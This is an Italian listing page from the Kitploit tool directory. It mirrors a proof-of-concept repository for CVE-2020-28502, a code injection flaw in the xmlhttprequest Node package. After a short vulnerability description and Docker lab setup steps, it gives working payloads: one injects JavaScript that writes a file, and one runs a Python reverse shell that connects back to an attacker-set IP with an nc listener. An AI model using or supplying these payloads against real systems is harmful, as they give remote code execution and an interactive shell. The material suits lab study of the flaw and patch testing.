Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-28502 — CVE-2020-28502 node-XMLHttpRequest RCE | Kitploit
Strumenti/GitHubGitHub/s-index/cve-2020-28502
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneStrumento di Accesso RemotoSviluppo Payload
GitHubs-index/cve-2020-28502

CVE-2020-28502

CVE-2020-28502 node-XMLHttpRequest RCE

Vedi Repository
325 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-28502 node-XMLHttpRequest RCE

Descrizione NVD

Questo riguarda il pacchetto xmlhttprequest precedente alla versione 1.7.0; tutte le versioni del pacchetto xmlhttprequest-ssl. Se le richieste vengono inviate in modalità sincrona (async=False su xhr.open), l'input utente malevolo che fluisce in xhr.send potrebbe causare l'iniezione e l'esecuzione di codice arbitrario.

Dimostrazione

cve-2020-28502

Configurazione

  1. Crea un'immagine da un Dockerfile
root@kitploit:~
$ docker build -t cve-2020-28502 .
  1. Esegui node app.js in un nuovo container
root@kitploit:~
$ docker run --rm -p 3000:3000 cve-2020-28502
  1. Accedi a http://localhost:3000

localhost-image

Payload PoC

Aggiungi file

Invia il payload

root@kitploit:~
\');require("fs").writeFileSync("./exploit.txt", "exploit!");req.end();//

Reverse Shell

  1. Metti in ascolto il client
root@kitploit:~
$ nc -l 8888
  1. Invia il payload

cambia l'indirizzo IP (192.168.0.25) con il tuo indirizzo IP locale

root@kitploit:~
\');require("child_process").exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.0.25\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'");req.end();//

Riferimenti

  • https://snyk.io/vuln/SNYK-JS-XMLHTTPREQUEST-1082935
Scarica lo strumento